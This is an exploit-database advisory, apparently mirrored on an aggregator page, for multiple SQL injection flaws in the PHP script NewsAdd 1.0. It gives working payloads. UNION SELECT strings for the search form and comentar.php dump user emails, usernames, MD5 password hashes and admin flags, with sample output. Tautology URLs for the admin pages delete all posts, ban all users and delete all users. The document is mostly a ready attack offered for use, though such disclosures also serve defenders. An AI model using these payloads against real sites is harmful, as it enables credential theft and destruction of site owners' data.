NewsAdd 1.0 – Multiple SQL Injections

• Exploit Database
• 128 阅读

• 作者： WhiteCollarGroup
  日期： 2012-05-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18950/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96

  # Exploit Title: NewsAdd <=1.0 Multiple SQL Injection # Google Dork: ----------------------------------- # Date: 2012/05/29 # Author: WhiteCollarGroup # Software Link: http://phpbrasil.com/script/3tCyUs1JeL1M/newsadd--mysql # Version: 1.0 # Tested on: Debian GNU/Linux   Developer URL: http://tvaini.ueuo.com/ Vulnerabilities discovered by WhiteCollarGroup www.wcgroup.host56.com whitecollar_group@hotmail.com   If you will install NewsAdd on your system for tests, some servers have problems with tabulation. Therefore, replace the second query: --- begin --- CREATE TABLE IF NOT EXISTS &apos;comentario&apos; ( &apos;id&apos; int(11) NOT NULL AUTO_INCREMENT, &apos;id_noticia&apos; int(11) NOT NULL, &apos;usuario&apos; varchar(15) NOT NULL, &apos;comentario&apos; text NOT NULL, &apos;data&apos; datetime NOT NULL, PRIMARY_KEY(&apos;id&apos;) ) ENGINE=MyISAMDEFAULT CHARSET=latin1 AUTO_INCREMENT=15 ; --- end --- By this: --- begin --- DROP TABLE IF EXISTS <code>comentario</code>; CREATE TABLE <code>comentario</code> ( id</code> int(11) NOT NULL AUTO_INCREMENT, id_noticia</code> int(11) NOT NULL, usuario</code> varchar(15) NOT NULL, comentario</code> text NOT NULL, data</code> datetime NOT NULL, PRIMARY KEY (<code>id</code>) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; --- end ---   We discovered five SQL Injection vulnerabilities on public access. _ |_| Vulnerabilities before login   / |SQL Injection on the search form \ The first vulnerability is in the search form, on index. Paste this in it: %&apos; UNION ALL SELECT 1,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),3,4,5 from usuarios-- wc   You will get a unique line like:   admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0,user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0   Lines are separated by commas (",") and columns, by "<=>". In the return, we have two lines:   admin@admin.com.br<=>admin<=>e10adc3949ba59abbe56e057f20f883e<=>1<=>0 user@email.com<=>user<=>ee11cbb19052e40b07aac0ca060c23ee<=>1<=>0   Here, we have the columns as follow: email <=> username <=> md5(password) <=> admin? <=> banned?   / |SQL Injection on comments \   For this, you must be a user. Register on the "cadastro.php" form. After, access: http://domain/comentar.php?id=-0&apos; union all select 1,2,3,group_concat(concat(email,0x3c3d3e,usuario,0x3c3d3e,senha,0x3c3d3e,admin,0x3c3d3e,banido)),5 from usuarios--+ You will view a line like the previous example.     _ |_| Vulnerabilities after login   / |Delete all posts \   /admin/removerNoticia.php?id=0&apos; or &apos;1&apos;=&apos;1&conf=sim     / |Ban all users \   /admin/listarUsuarios.php?acao=banir&id=0&apos; or &apos;1&apos;=&apos;1     / |Delete all users \   /admin/removerUsuario.php?id=0&apos; or &apos;1&apos;=&apos;1&conf=sim   Note that if you delete all users, you will lose access to the system.